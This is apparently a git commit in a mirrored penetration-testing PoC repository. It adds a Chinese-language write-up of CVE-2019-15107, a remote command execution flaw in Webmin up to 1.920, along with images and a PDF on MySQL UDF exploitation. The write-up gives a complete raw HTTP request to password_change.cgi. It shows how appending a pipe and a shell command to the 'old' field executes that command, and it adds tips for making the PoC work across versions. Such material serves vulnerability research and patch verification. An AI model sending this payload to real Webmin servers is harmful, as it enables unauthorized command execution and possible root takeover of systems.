mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-22 02:40:31 +00:00
add CVE-2019-15107 Webmin 1.920 远程命令执行漏洞 44139-mysql-udf-exploitation.pdf
This commit is contained in:
parent
17ba221ee6
commit
bfcf20cf15
76
CVE-2019-15107 Webmin 1.920 远程命令执行漏洞.md
Normal file
76
CVE-2019-15107 Webmin 1.920 远程命令执行漏洞.md
Normal file
@ -0,0 +1,76 @@
|
|||||||
|
## 前言
|
||||||
|
|
||||||
|
CVE-2019-15107 Webmin <= 1.920 远程命令执行漏洞,漏洞需要开启密码重置功能。
|
||||||
|
|
||||||
|
## 漏洞简介
|
||||||
|
|
||||||
|
CVE-2019-15107 Webmin <= 1.920 远程命令执行漏洞,可以直接执行系统命令
|
||||||
|
|
||||||
|
## 漏洞危害
|
||||||
|
|
||||||
|
直接执行命令,如果webmin权限大可以直接获取到系统最高权限
|
||||||
|
|
||||||
|
## 影响范围
|
||||||
|
|
||||||
|
### 产品
|
||||||
|
|
||||||
|
> Webmin
|
||||||
|
|
||||||
|
### 版本
|
||||||
|
|
||||||
|
> Webmin <= 1.920 版本
|
||||||
|
|
||||||
|
### 组件
|
||||||
|
|
||||||
|
> Webmin
|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
|
||||||
|
首先开启密码重置功能:
|
||||||
|
在控制界面 https://ip:10000/webmin/edit_session.cgi?xnavigation=1
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
等待webmin重启,配置生效。查看webmin的配置文件,可以发现`passwd_mode`的值已经从`0`变为了`2`。
|
||||||
|
```shell
|
||||||
|
# cat /etc/webmin/miniserv.conf
|
||||||
|
...
|
||||||
|
passwd_mode=2
|
||||||
|
...
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|
数据库包如下:
|
||||||
|
|
||||||
|
```raw
|
||||||
|
POST /password_change.cgi HTTP/1.1
|
||||||
|
Host: yourip:10000
|
||||||
|
Connection: close
|
||||||
|
Content-Length: 63
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Origin: https://yourip:10000
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Referer: https://yourip:10000/session_login.cgi
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: zh-CN,zh;q=0.9
|
||||||
|
Cookie: redirect=1; testing=1; sessiontest=1; sid=x
|
||||||
|
|
||||||
|
user=root&pam=1&expired=2&old=buyaoxiedaopocli&new1=buyaoxiedaopocli&new2=buyaoxiedaopocli
|
||||||
|
```
|
||||||
|
|
||||||
|
在参数`old`后加上`|ifconfig` 执行`ifconfig`命令。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
如果user不存在,同样能执行命令
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
> PS: 1.910需要传入的user不存在,否则不能执行命令。不知道更老的版本会如何。建议为了全版本使用,POC最好传入一个不存在的user。
|
||||||
|
|
BIN
books/44139-mysql-udf-exploitation.pdf
Normal file
BIN
books/44139-mysql-udf-exploitation.pdf
Normal file
Binary file not shown.
BIN
img/42.png
Normal file
BIN
img/42.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 15 KiB |
BIN
img/43.jpeg
Normal file
BIN
img/43.jpeg
Normal file
Binary file not shown.
After Width: | Height: | Size: 64 KiB |
BIN
img/44.jpeg
Normal file
BIN
img/44.jpeg
Normal file
Binary file not shown.
After Width: | Height: | Size: 122 KiB |
BIN
img/45.jpeg
Normal file
BIN
img/45.jpeg
Normal file
Binary file not shown.
After Width: | Height: | Size: 535 KiB |
BIN
img/46.png
Normal file
BIN
img/46.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 131 KiB |
Loading…
x
Reference in New Issue
Block a user